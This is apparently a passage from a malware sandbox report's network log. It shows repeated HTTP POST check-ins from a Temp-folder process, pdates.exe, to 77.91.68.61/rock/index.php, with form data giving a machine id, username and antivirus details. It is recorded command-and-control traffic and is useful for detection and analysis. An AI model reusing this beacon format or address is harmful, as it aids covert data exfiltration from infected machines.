Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:17.520832062 CEST	3833	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:17.569597006 CEST	3834	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:17 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
275	192.168.2.5	49995	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:17.737358093 CEST	3838	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:17.786513090 CEST	3839	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:17 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
276	192.168.2.5	49996	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:17.950701952 CEST	3839	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:18.000893116 CEST	3840	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:17 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
277	192.168.2.5	49997	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:18.154798985 CEST	3840	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:18.238967896 CEST	3841	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:18 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
278	192.168.2.5	49998	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:18.387715101 CEST	3841	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:18.474417925 CEST	3842	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:18 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
279	192.168.2.5	49999	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:18.645324945 CEST	3842	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:18.693546057 CEST	3843	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:18 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
28	192.168.2.5	49744	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:09.215158939 CEST	2860	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:09.264782906 CEST	2861	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:09 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
280	192.168.2.5	50000	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:18.857589006 CEST	3843	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:18.906615973 CEST	3843	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:18 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
281	192.168.2.5	50001	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:19.074866056 CEST	3844	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:19.123893023 CEST	3844	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:19 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
282	192.168.2.5	50002	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:19.283188105 CEST	3845	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:19.331818104 CEST	3845	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:19 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
283	192.168.2.5	50003	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:19.508650064 CEST	3846	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:19.557003975 CEST	3846	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:19 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
284	192.168.2.5	50004	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:19.736316919 CEST	3847	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:19.784987926 CEST	3848	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:19 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
285	192.168.2.5	50005	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:19.990180016 CEST	3848	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:20.039556026 CEST	3848	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:20 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
286	192.168.2.5	50006	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:20.205437899 CEST	3849	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:20.255646944 CEST	3849	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:20 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
287	192.168.2.5	50007	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:20.411632061 CEST	3850	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:20.480606079 CEST	3850	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:20 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
288	192.168.2.5	50008	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:20.646996021 CEST	3851	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:20.696115971 CEST	3851	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:20 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
289	192.168.2.5	50009	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:20.869402885 CEST	3852	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:20.918095112 CEST	3852	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:20 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
29	192.168.2.5	49745	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:09.438489914 CEST	2861	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:09.488131046 CEST	2862	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:09 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
290	192.168.2.5	50010	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:21.080696106 CEST	3853	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:21.130582094 CEST	3853	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:21 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
291	192.168.2.5	50011	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:21.288976908 CEST	3854	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:21.337984085 CEST	3854	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:21 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
292	192.168.2.5	50012	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:21.518992901 CEST	3855	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:21.567137957 CEST	3855	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:21 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
293	192.168.2.5	50013	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:21.725615978 CEST	3856	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:21.774426937 CEST	3856	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:21 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
294	192.168.2.5	50014	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:21.935902119 CEST	3857	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:21.984183073 CEST	3857	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:21 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
295	192.168.2.5	50015	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
